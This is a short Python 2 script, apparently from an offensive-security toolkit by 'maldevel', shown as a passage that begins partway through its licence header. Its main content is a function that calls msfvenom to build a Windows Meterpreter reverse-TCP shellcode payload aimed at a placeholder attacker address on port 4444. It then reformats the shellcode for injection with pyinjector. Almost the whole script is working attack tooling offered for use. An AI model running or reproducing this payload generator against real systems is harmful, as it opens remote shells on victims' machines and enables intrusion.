15 | MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
16 | GNU General Public License for more details.
17 |
18 | You should have received a copy of the GNU General Public License
19 | along with this program. If not, see .
20 |
21 | For more see the file 'LICENSE' for copying permission.
22 | """
23 |
24 | __author__ = "maldevel"
25 | __copyright__ = "Copyright (c) 2017 @maldevel"
26 | __credits__ = ["maldevel"]
27 | __license__ = "GPLv3"
28 | __version__ = "1.0"
29 | __maintainer__ = "maldevel"
30 |
31 | # quick script that generates the proper format for the shellcode to feed into pyinjector
32 | # generates powershell payload from @trustedsec pyinjector
33 |
34 | import subprocess
35 |
36 | def generate_powershell_shellcode(payload, ipaddr, port):
37 | # grab the metasploit path
38 | msf_path = "/usr/local/share/metasploit-framework/"
39 | # generate payload
40 | proc = subprocess.Popen("%smsfvenom -p %s LHOST=%s LPORT=%s -a x86 --platform Windows EXITFUNC=thread -f python" % (msf_path,payload,ipaddr,port), stdout=subprocess.PIPE, shell=True)
41 | data = proc.communicate()[0]
42 | # start to format this a bit to get it ready
43 | data = data.replace(";", "")
44 | data = data.replace(" ", "")
45 | data = data.replace("+", "")
46 | data = data.replace('"', "")
47 | data = data.replace("\n", "")
48 | data = data.replace("buf=", "")
49 | data = data.rstrip()
50 | # base counter
51 | print data
52 |
53 | generate_powershell_shellcode("windows/meterpreter/reverse_tcp", "x.x.x.x", "4444")
54 |
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